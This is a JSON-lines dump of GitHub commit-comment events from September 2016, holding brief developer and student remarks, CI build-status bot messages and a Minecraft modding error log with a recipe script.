{"id":"4587273305","type":"CommitCommentEvent","actor":{"login":"simwah"},"repo":{"name":"mistergoodson/OCAP"},"payload":{"comment":{"id":19089877,"position":null,"line":null,"path":null,"commit_id":"361bcaa0097ea217ab0de8f68ba19a26d0a0dc70","created_at":"2016-09-20T03:31:33Z","updated_at":"2016-09-20T03:31:33Z","body":"This has introduced an issue #37 "}},"created_at":"2016-09-20T03:31:33Z"}
{"id":"4587274863","type":"CommitCommentEvent","actor":{"login":"byunchangbin"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":19089880,"position":null,"line":null,"path":null,"commit_id":"48d45a740102ca3837c68c58669e95f6bc031713","created_at":"2016-09-20T03:32:14Z","updated_at":"2016-09-20T03:32:14Z","body":"안녕하세요 조원 변창빈입니다. 잘해봐요~"}},"created_at":"2016-09-20T03:32:14Z"}
{"id":"4587278207","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19089893,"position":null,"line":null,"path":null,"commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-20T03:33:38Z","updated_at":"2016-09-20T03:33:38Z","body":"System(\"pause\");는 불필요한건가요!?"}},"created_at":"2016-09-20T03:33:38Z"}
{"id":"4587280180","type":"CommitCommentEvent","actor":{"login":"supreme0530"},"repo":{"name":"supreme0530/SLNavigationController"},"payload":{"comment":{"id":19089896,"position":null,"line":null,"path":null,"commit_id":"cc246059a1c9987299a1f9385ebd6c99b4d57010","created_at":"2016-09-20T03:34:27Z","updated_at":"2016-09-20T03:34:27Z","body":"V1.0.0"}},"created_at":"2016-09-20T03:34:27Z"}
{"id":"4587281848","type":"CommitCommentEvent","actor":{"login":"HungtenaZhao"},"repo":{"name":"HungtenaZhao/MachineLearning"},"payload":{"comment":{"id":19089900,"position":1,"line":1,"path":"readme.md","commit_id":"823354efc3373226b8ebc69117acc56c7e9b9831","created_at":"2016-09-20T03:35:10Z","updated_at":"2016-09-20T03:35:10Z","body":"fff"}},"created_at":"2016-09-20T03:35:10Z"}
{"id":"4587286291","type":"CommitCommentEvent","actor":{"login":"dennyfricia0"},"repo":{"name":"selfishantics/garrulous-wookie"},"payload":{"comment":{"id":19089911,"position":null,"line":null,"path":null,"commit_id":"e2252c3c287380652f40a38a029edd9106f1d12d","created_at":"2016-09-20T03:37:01Z","updated_at":"2016-09-20T03:37:01Z","body":" \r\n![moments_529415857225892](https://cloud.githubusercontent.com/assets/15710522/18656752/93656f90-7eb9-11e6-93eb-e5c37c7e93f1.jpg)\r\n#[](url)"}},"created_at":"2016-09-20T03:37:01Z"}
{"id":"4587286334","type":"CommitCommentEvent","actor":{"login":"ky0ncheng"},"repo":{"name":"popkings/gfw_whitelist"},"payload":{"comment":{"id":19089912,"position":null,"line":null,"path":null,"commit_id":"7ddef6d1414db8c76b81d87f3992fd9a5d60509b","created_at":"2016-09-20T03:37:02Z","updated_at":"2016-09-20T03:37:02Z","body":"药店碧莲"}},"created_at":"2016-09-20T03:37:02Z"}
{"id":"4587286953","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089916,"position":null,"line":null,"path":null,"commit_id":"1ad365fd035bbc7ad13dc97986694fa8342a334e","created_at":"2016-09-20T03:37:17Z","updated_at":"2016-09-20T03:37:17Z","body":"5665-coincident-plant-bug (mjwitte) - i386-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1ad365fd035bbc7ad13dc97986694fa8342a334e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T03:37:17Z"}
{"id":"4587294763","type":"CommitCommentEvent","actor":{"login":"HwanHee-Lee"},"repo":{"name":"HwanHee-Lee/ZzayoZaayo_1"},"payload":{"comment":{"id":19089938,"position":null,"line":null,"path":null,"commit_id":"13a5175213ab645f006e94fc515d77e527957e90","created_at":"2016-09-20T03:40:29Z","updated_at":"2016-09-20T03:40:29Z","body":"test"}},"created_at":"2016-09-20T03:40:29Z"}
{"id":"4587297022","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-responsive"},"payload":{"comment":{"id":19089945,"position":303,"line":303,"path":"Assignment/starter_code/css/style.css","commit_id":"2027e86b3439288526bcf6e4591ee2ae097e591e","created_at":"2016-09-20T03:41:24Z","updated_at":"2016-09-20T03:41:24Z","body":"Nice touch adding animation!"}},"created_at":"2016-09-20T03:41:24Z"}
{"id":"4587306998","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-responsive"},"payload":{"comment":{"id":19089968,"position":31,"line":31,"path":"Assignment/starter_code/index.html","commit_id":"2027e86b3439288526bcf6e4591ee2ae097e591e","created_at":"2016-09-20T03:45:31Z","updated_at":"2016-09-20T03:45:31Z","body":"Overall your code is looking great, but there are a few areas that your indentation is off. For example, the nav section should look like this:\r\n```\r\n<nav>\r\n  <ul class=\"nav-ul\">\r\n    <li>\r\n      <div class=\"line\"></div>\r\n      <div class=\"line\"></div>\r\n      <div class=\"line\"></div>\r\n    </li>\r\n    <li><a href=\"index.html\">Home</a></li>\r\n    <li><a href=\"#\">About</a></li>\r\n    <li><a href=\"#\">Contact</a></li>\r\n    <li><a href=\"blog.html\">Blog</a></li>\r\n  </ul>\r\n</nav>\r\n```\r\nIt makes it easier for both you and other developers to read your code."}},"created_at":"2016-09-20T03:45:31Z"}
{"id":"4587308096","type":"CommitCommentEvent","actor":{"login":"scyrma"},"repo":{"name":"hmimthiaz/EWZRecaptchaBundle"},"payload":{"comment":{"id":19089974,"position":null,"line":null,"path":null,"commit_id":"cc98169493a5c0d7e8663a3a1938ad0f8be34876","created_at":"2016-09-20T03:45:59Z","updated_at":"2016-09-20T03:45:59Z","body":"I'm really looking forward to this being part of a release, but it should be 'language' instead of 'langauge'."}},"created_at":"2016-09-20T03:45:59Z"}
{"id":"4587308608","type":"CommitCommentEvent","actor":{"login":"masami-morimoto"},"repo":{"name":"masami-morimoto/masami-morimoto"},"payload":{"comment":{"id":19089976,"position":null,"line":null,"path":null,"commit_id":"2a1cd3d975a5e234a8ebf5c85be1a8970687e078","created_at":"2016-09-20T03:46:12Z","updated_at":"2016-09-20T03:46:12Z","body":"[CG_214_Week3,HW (1).zip](https://github.com/masami-morimoto/masami-morimoto/files/481588/CG_214_Week3.HW.1.zip)\r\n"}},"created_at":"2016-09-20T03:46:12Z"}
{"id":"4587309131","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089977,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T03:46:25Z","updated_at":"2016-09-20T03:46:25Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1192 of 1192 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T03:46:25Z"}
{"id":"4587310177","type":"CommitCommentEvent","actor":{"login":"loganmc10"},"repo":{"name":"gonetz/GLideN64"},"payload":{"comment":{"id":19089979,"position":null,"line":null,"path":null,"commit_id":"8dad84cc39571c295d10a3b3c9326fa942478fcd","created_at":"2016-09-20T03:46:52Z","updated_at":"2016-09-20T03:46:52Z","body":"It happens whether Framebuffer emulation is on or off, and it just started happening today"}},"created_at":"2016-09-20T03:46:52Z"}
{"id":"4587311074","type":"CommitCommentEvent","actor":{"login":"masami-morimoto"},"repo":{"name":"masami-morimoto/masami-morimoto"},"payload":{"comment":{"id":19089982,"position":1,"line":1,"path":"Week3/HW/CG_214_HW for Week4,HW/pages/REVISED FILE","commit_id":"2a1cd3d975a5e234a8ebf5c85be1a8970687e078","created_at":"2016-09-20T03:47:16Z","updated_at":"2016-09-20T03:47:16Z","body":"\r\n[CG_214_Week3,HW (1).zip](https://github.com/masami-morimoto/masami-morimoto/files/481590/CG_214_Week3.HW.1.zip)\r\n"}},"created_at":"2016-09-20T03:47:16Z"}
{"id":"4587311158","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089983,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T03:47:18Z","updated_at":"2016-09-20T03:47:18Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T03:47:18Z"}
{"id":"4587312063","type":"CommitCommentEvent","actor":{"login":"masami-morimoto"},"repo":{"name":"masami-morimoto/masami-morimoto"},"payload":{"comment":{"id":19089986,"position":1,"line":1,"path":"Week3/HW/CG_214_HW for Week4,HW/pages/REVISED FILE","commit_id":"2a1cd3d975a5e234a8ebf5c85be1a8970687e078","created_at":"2016-09-20T03:47:41Z","updated_at":"2016-09-20T03:47:41Z","body":"this is the revised file for HW 3"}},"created_at":"2016-09-20T03:47:41Z"}
{"id":"4587312187","type":"CommitCommentEvent","actor":{"login":"fffonion"},"repo":{"name":"joylio/joyncong"},"payload":{"comment":{"id":19089987,"position":15,"line":15,"path":"Our Shared Goals/Workouts.md","commit_id":"373708c67791f2cb5233addc5f59acf7c08f3f74","created_at":"2016-09-20T03:47:43Z","updated_at":"2016-09-20T03:47:43Z","body":"no muscles ... for now 😄 "}},"created_at":"2016-09-20T03:47:43Z"}
{"id":"4587312841","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19089992,"position":null,"line":null,"path":null,"commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-20T03:48:00Z","updated_at":"2016-09-20T03:48:00Z","body":"io"}},"created_at":"2016-09-20T03:48:00Z"}
{"id":"4587313325","type":"CommitCommentEvent","actor":{"login":"gabrielamrqz"},"repo":{"name":"gabrielamrqz/data-health"},"payload":{"comment":{"id":19089997,"position":null,"line":null,"path":null,"commit_id":"ac1e0f470dcc6b5e1c9f62ec6148ce14350a7103","created_at":"2016-09-20T03:48:13Z","updated_at":"2016-09-20T03:48:13Z","body":"+++"}},"created_at":"2016-09-20T03:48:13Z"}
{"id":"4587314342","type":"CommitCommentEvent","actor":{"login":"kukookoo"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19090001,"position":null,"line":null,"path":null,"commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-20T03:48:39Z","updated_at":"2016-09-20T03:48:39Z","body":"확인했습니다."}},"created_at":"2016-09-20T03:48:39Z"}
{"id":"4587315252","type":"CommitCommentEvent","actor":{"login":"kathryngo"},"repo":{"name":"zanata/zanata-server"},"payload":{"comment":{"id":19090008,"position":5,"line":41,"path":"etc/scripts/quickbuild.sh","commit_id":"5911942e2f9e9566264debadabde5daf467929a9","created_at":"2016-09-20T03:49:01Z","updated_at":"2016-09-20T03:49:01Z","body":"I made sure to remove that bit about excluding frontend. Thanks."}},"created_at":"2016-09-20T03:49:01Z"}
{"id":"4587317927","type":"CommitCommentEvent","actor":{"login":"fffonion"},"repo":{"name":"joylio/joyncong"},"payload":{"comment":{"id":19090015,"position":11,"line":11,"path":"Our Shared Goals/Dress Code.md","commit_id":"373708c67791f2cb5233addc5f59acf7c08f3f74","created_at":"2016-09-20T03:50:09Z","updated_at":"2016-09-20T03:50:09Z","body":"reminds me of\r\n![20140112_8072](https://cloud.githubusercontent.com/assets/2135445/18656954/c26e21ce-7ec3-11e6-8a86-752c0ff2ffdb.jpg)\r\n"}},"created_at":"2016-09-20T03:50:09Z"}
{"id":"4587323113","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"rtaykowski/homework-responsive"},"payload":{"comment":{"id":19090028,"position":5,"line":5,"path":"Assignment/starter_code/js/main.js","commit_id":"2027e86b3439288526bcf6e4591ee2ae097e591e","created_at":"2016-09-20T03:52:26Z","updated_at":"2016-09-20T03:52:26Z","body":"Excellent job implementing the mobile nav!"}},"created_at":"2016-09-20T03:52:26Z"}
{"id":"4587326454","type":"CommitCommentEvent","actor":{"login":"gbognon25"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":19090036,"position":null,"line":null,"path":null,"commit_id":"48d45a740102ca3837c68c58669e95f6bc031713","created_at":"2016-09-20T03:53:49Z","updated_at":"2016-09-20T03:53:49Z","body":"안녕하세요 조원 리칸 소성입니다. 잘부탁드립니다."}},"created_at":"2016-09-20T03:53:49Z"}
{"id":"4587328119","type":"CommitCommentEvent","actor":{"login":"sakieltang"},"repo":{"name":"BelledonneCommunications/linphone-iphone"},"payload":{"comment":{"id":19090041,"position":null,"line":null,"path":null,"commit_id":"5a785b7b9d41b0ede7d29ba4fcdbd21441d75d0b","created_at":"2016-09-20T03:54:31Z","updated_at":"2016-09-20T03:54:31Z","body":"![Uploading 屏幕快照 2016-09-20 上午11.53.32.png…]()\r\nI download the newest code, but it still not work on XCode8."}},"created_at":"2016-09-20T03:54:31Z"}
{"id":"4587328417","type":"CommitCommentEvent","actor":{"login":"pedrootorres"},"repo":{"name":"pet-informatica/CinQuest"},"payload":{"comment":{"id":19090044,"position":null,"line":null,"path":null,"commit_id":"0d2f4727c7c302d72bb74e07eb6fd283271420bb","created_at":"2016-09-20T03:54:40Z","updated_at":"2016-09-20T03:54:40Z","body":"@rcalegario fazendo merda ne?"}},"created_at":"2016-09-20T03:54:40Z"}
{"id":"4587328816","type":"CommitCommentEvent","actor":{"login":"ryancheung"},"repo":{"name":"EmberEmu/Ember"},"payload":{"comment":{"id":19090047,"position":13,"line":112,"path":"src/login/main.cpp","commit_id":"1ccb801b5c304cc5a65f2508c7b3e12f8d46e07c","created_at":"2016-09-20T03:54:48Z","updated_at":"2016-09-20T03:54:48Z","body":"Understood, tks!"}},"created_at":"2016-09-20T03:54:48Z"}
{"id":"4587330959","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19090052,"position":null,"line":null,"path":null,"commit_id":"1621d7e089ea5034344c357d38bb757b3fbf94b8","created_at":"2016-09-20T03:55:38Z","updated_at":"2016-09-20T03:55:38Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-20T03:55:38Z"}
{"id":"4587339713","type":"CommitCommentEvent","actor":{"login":"ajdamico"},"repo":{"name":"gergness/srvyr"},"payload":{"comment":{"id":19090068,"position":null,"line":null,"path":null,"commit_id":"b6733f54248c3ff40372f70d916dd64a236018e2","created_at":"2016-09-20T03:59:11Z","updated_at":"2016-09-20T03:59:11Z","body":"@gergness you are on fire  cc @hannesmuehleisen"}},"created_at":"2016-09-20T03:59:11Z"}
{"id":"4587342683","type":"CommitCommentEvent","actor":{"login":"mightydanp"},"repo":{"name":"jaredlll08/ModTweaker"},"payload":{"comment":{"id":19090075,"position":null,"line":null,"path":null,"commit_id":"2a9a8679390631fc25ca3902bd6bd5f1ace2c2bd","created_at":"2016-09-20T04:00:16Z","updated_at":"2016-09-20T04:00:16Z","body":"I just downloaded the src and did a build of this change and i get this\r\n\r\nINFO: MineTweaker: Building registry\r\nINFO: MineTweaker: Sucessfully built item registry\r\nINFO: Adding command minetweaker\r\nINFO: Adding minetweaker command tooltips\r\nINFO: \r\nINFO: Adding minetweaker command randomthings\r\nINFO: Adding minetweaker command materials\r\nINFO: Adding minetweaker command modifiers\r\nINFO: Adding minetweaker command tconstruct\r\nERROR: ?:1 > No such member: botania\r\nERROR: ?:1 > Not a valid type\r\nERROR: Botania.zs:9 > No such member: botania\r\nERROR: Botania.zs:10 > No such member: botania\r\nERROR: Error executing Botania.zs: 2\r\njava.lang.ArrayIndexOutOfBoundsException: 2\r\n\tat stanhebben.zenscript.type.natives.JavaMethod.rematch(JavaMethod.java:153)\r\n\tat stanhebben.zenscript.expression.ExpressionCallVirtual.<init>(ExpressionCallVirtual.java:37)\r\n\tat stanhebben.zenscript.type.ZenTypeAny.call(ZenTypeAny.java:202)\r\n\tat stanhebben.zenscript.expression.Expression.call(Expression.java:81)\r\n\tat stanhebben.zenscript.parser.expression.ParsedExpressionCall.compile(ParsedExpressionCall.java:42)\r\n\tat stanhebben.zenscript.statements.StatementExpression.compile(StatementExpression.java:19)\r\n\tat stanhebben.zenscript.ZenModule.compileScripts(ZenModule.java:111)\r\n\tat minetweaker.runtime.MTTweaker.load(MTTweaker.java:157)\r\n\tat minetweaker.MineTweakerImplementationAPI.reload(MineTweakerImplementationAPI.java:682)\r\n\tat minetweaker.MineTweakerImplementationAPI.onServerStart(MineTweakerImplementationAPI.java:591)\r\n\tat minetweaker.mc1102.MineTweakerMod.onServerStarting(MineTweakerMod.java:160)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:483)\r\n\tat net.minecraftforge.fml.common.FMLModContainer.handleModStateEvent(FMLModContainer.java:597)\r\n\tat sun.reflect.GeneratedMethodAccessor3.invoke(Unknown Source)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:483)\r\n\tat com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74)\r\n\tat com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47)\r\n\tat com.google.common.eventbus.EventBus.dispatch(EventBus.java:322)\r\n\tat com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304)\r\n\tat com.google.common.eventbus.EventBus.post(EventBus.java:275)\r\n\tat net.minecraftforge.fml.common.LoadController.sendEventToModContainer(LoadController.java:239)\r\n\tat net.minecraftforge.fml.common.LoadController.propogateStateMessage(LoadController.java:217)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:483)\r\n\tat com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74)\r\n\tat com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47)\r\n\tat com.google.common.eventbus.EventBus.dispatch(EventBus.java:322)\r\n\tat com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304)\r\n\tat com.google.common.eventbus.EventBus.post(EventBus.java:275)\r\n\tat net.minecraftforge.fml.common.LoadController.distributeStateMessage(LoadController.java:142)\r\n\tat net.minecraftforge.fml.common.Loader.serverStarting(Loader.java:840)\r\n\tat net.minecraftforge.fml.common.FMLCommonHandler.handleServerStarting(FMLCommonHandler.java:292)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n\tat sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n\tat java.lang.reflect.Method.invoke(Method.java:483)\r\n\tat Reflector.callBoolean(Reflector.java:523)\r\n\tat net.minecraft.server.integrated.IntegratedServer.func_71197_b(IntegratedServer.java:205)\r\n\tat net.minecraft.server.MinecraftServer.run(MinecraftServer.java:431)\r\n\tat java.lang.Thread.run(Thread.java:745)\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Low Voltage Solar Array\r\nERROR: ?:2 > No such member: nei\r\nERROR: ?:2 > Not a valid type\r\nERROR: Ender IO.zs:3 > No such member: gregtech\r\nERROR: Ender IO.zs:3 > Not a valid type\r\nINFO: Removing 4 furnace recipes\r\nINFO: Removing Silicon from ore dictionary entry itemSilicon\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Insulated Redstone Conduit\r\nINFO: Removing 0 recipes\r\nINFO: Adding recipe for Insulated Redstone Conduit\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Network Conduit (OC)\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Basic Gear\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Machine Chassis\r\nINFO: Removing 1 recipes\r\nINFO: Removing 1 recipes\r\nINFO: Removing 1 recipes\r\nINFO: Removing 2 recipes\r\nINFO: Removing 2 recipes\r\nINFO: Removing 1 recipes\r\nINFO: Removing 2 recipes\r\nINFO: Removing 2 recipes\r\nINFO: Removing 1 recipes\r\nINFO: Removing 0 recipes\r\nINFO: Adding recipe for Red Alloy Ingot\r\nINFO: Removing 3 furnace recipes\r\nINFO: Removing 2 recipes\r\nINFO: Turbine Housing Core\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Turbine Housing Core (Legacy)\r\nINFO: Turbine Housing\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Turbine Housing (Legacy)\r\nINFO: Turbine Glass\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Turbine Glass (Legacy)\r\nINFO: Reactor Housing Core\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Reactor Casing Core (Legacy)\r\nINFO: Reactor Housing\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Reactor Casing (Legacy)\r\nINFO: Reactor Glass\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Reactor Glass (Legacy)\r\nINFO: Fuel Rod\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Reactor Fuel Rod (Legacy)\r\nINFO: Turbine Rotor Shaft\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Turbine Rotor Shaft (Legacy)\r\nINFO: Turbine Rotor Blade\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Turbine Rotor Blade (Legacy)\r\nINFO: Extreme Wrench\r\nINFO: Removing 1 recipes\r\nINFO: Adding recipe for Extreme Wrench\r\nINFO: \r\nINFO: \r\nINFO: \r\nINFO: \r\nINFO: \r\nINFO: \r\nINFO: tried to remove command: tconstruct failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: modifiers failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: materials failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: randomthings failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: entities failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: tooltips failed. THIS IS NOT AN ERROR!\r\nINFO: Removing recipe for Extreme Wrench\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Turbine Rotor Blade (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Turbine Rotor Shaft (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Reactor Fuel Rod (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Reactor Glass (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Reactor Casing (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Reactor Casing Core (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Turbine Glass (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Turbine Housing (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Turbine Housing Core (Legacy)\r\nINFO: Restoring 1 recipes\r\nINFO: Restoring 2 recipes\r\nINFO: Restoring 3 furnace recipes\r\nINFO: Removing recipe for Red Alloy Ingot\r\nINFO: Restoring 0 recipes\r\nINFO: Restoring 1 recipes\r\nINFO: Restoring 2 recipes\r\nINFO: Restoring 2 recipes\r\nINFO: Restoring 1 recipes\r\nINFO: Restoring 2 recipes\r\nINFO: Restoring 2 recipes\r\nINFO: Restoring 1 recipes\r\nINFO: Restoring 1 recipes\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Machine Chassis\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Basic Gear\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Network Conduit (OC)\r\nINFO: Restoring 1 recipes\r\nINFO: Removing recipe for Insulated Redstone Conduit\r\nINFO: Restoring 0 recipes\r\nINFO: Removing recipe for Insulated Redstone Conduit\r\nINFO: Restoring 1 recipes\r\nINFO: Restoring Silicon to ore dictionary entry itemSilicon\r\nINFO: Restoring 4 furnace recipes\r\nINFO: Removing recipe for Low Voltage Solar Array\r\nINFO: Restoring 1 recipes\r\nINFO: tried to remove command: tconstruct failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: modifiers failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: materials failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: randomthings failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: entities failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: tooltips failed. THIS IS NOT AN ERROR!\r\nINFO: tried to remove command: minetweaker failed. THIS IS NOT AN ERROR!\r\nINFO: \r\nINFO: \r\nINFO: \r\nINFO: \r\nINFO: \r\nINFO: "}},"created_at":"2016-09-20T04:00:16Z"}
{"id":"4587343163","type":"CommitCommentEvent","actor":{"login":"lukefromdc"},"repo":{"name":"mate-desktop/mate-themes"},"payload":{"comment":{"id":19090077,"position":null,"line":null,"path":null,"commit_id":"16f0e3acab4cef9abdd3e1a0526d862d03bd9484","created_at":"2016-09-20T04:00:24Z","updated_at":"2016-09-20T04:00:24Z","body":"Closes https://github.com/mate-desktop/mate-themes/issues/139"}},"created_at":"2016-09-20T04:00:24Z"}
{"id":"4587343366","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19090078,"position":null,"line":null,"path":null,"commit_id":"0942faa9a07af7dcb7085989adb622c437c3869d","created_at":"2016-09-20T04:00:28Z","updated_at":"2016-09-20T04:00:28Z","body":"글쓰고 싶어요 :)"}},"created_at":"2016-09-20T04:00:28Z"}
{"id":"4587344132","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"spil3141/--Group-7-Team-work--"},"payload":{"comment":{"id":19090079,"position":2,"line":2,"path":"README.md","commit_id":"0942faa9a07af7dcb7085989adb622c437c3869d","created_at":"2016-09-20T04:00:43Z","updated_at":"2016-09-20T04:00:43Z","body":"탬 -> 팀 (TEAM)"}},"created_at":"2016-09-20T04:00:43Z"}
{"id":"4587345210","type":"CommitCommentEvent","actor":{"login":"mightydanp"},"repo":{"name":"jaredlll08/ModTweaker"},"payload":{"comment":{"id":19090085,"position":null,"line":null,"path":null,"commit_id":"2a9a8679390631fc25ca3902bd6bd5f1ace2c2bd","created_at":"2016-09-20T04:01:07Z","updated_at":"2016-09-20T04:01:07Z","body":"import mods.botania.ManaInfusion;\r\n\r\nval steel = <ore:ingotSteel>;\r\nval mana = <ore:ingotManaSteel>;\r\nval manasteel = <botania:manaResource>;\r\nval blocksteel = <ore:blockSteel>;\r\n\r\n// botania Nerf\r\nmods.botania.ManaInfusion.removeRecipe(<botania:manaResource>);\r\nmods.botania.ManaInfusion.addInfusion(<botania:manaResource>, steel, 1000);\r\n\r\nmods.botania.ManaInfusion.removeRecipe(<botania:storage>);\r\nmods.botania.ManaInfusion.addInfusion(<botania:storage>, blocksteel, 5000);"}},"created_at":"2016-09-20T04:01:07Z"}
